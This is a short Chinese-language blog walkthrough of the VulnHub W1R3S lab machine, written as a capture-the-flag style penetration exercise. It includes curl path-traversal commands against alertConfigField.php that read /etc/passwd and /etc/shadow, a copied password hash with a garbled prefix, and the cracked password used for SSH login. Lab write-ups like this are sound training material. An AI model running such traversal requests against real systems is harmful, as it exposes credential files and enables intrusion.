2021年1月2日-VulnHub-W1R3S 滲透學習

在下菜鳥發表於2021-01-02

VulnHub-W1R3S 滲透學習

靶機下載地址:https://www.vulnhub.com/entry/w1r3s-101,220/

kali地址:192.168.31.77

靶機IP地址:192.168.31.11

一、資訊收集

image-20210101234605239

image-20210101235026322

image-20210101235128950

使用dirb 爆破目錄

image-20210101235909523

image-20210102000003741

image-20210102000242350

image-20210102000302760

image-20210102000908898

curl是一個命令列工具,可用於在網路上傳輸資料。

它支援許多現成的協議,包括HTTP,HTTPS,FTP,FTPS,SFTP,IMAP,SMTP,POP3等。

在除錯網路請求時,curl是您可以找到的最佳工具之一。

curl使用 教程 https://flaviocopes.com/http-curl/

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.31.11/administrator/alerts/alertConfigField.php

image-20210102001433135

image-20210102001454423

然後我再次執行以下命令,使用相同的過程獲取密碼檔案。

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.11/administrator/alerts/alertConfigField.php

image-20210102001740816

將 w1r3s: 6 6 6xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

複製到一個 pass.txt 文字檔案中

image-20210102010625799

得到w1r3s 的密碼computer

使用 ssh登入

image-20210102010814344

獲得flag.txt

image-20210102011022210

獲得flag.txt

這個靶機還是比較簡單的

相關文章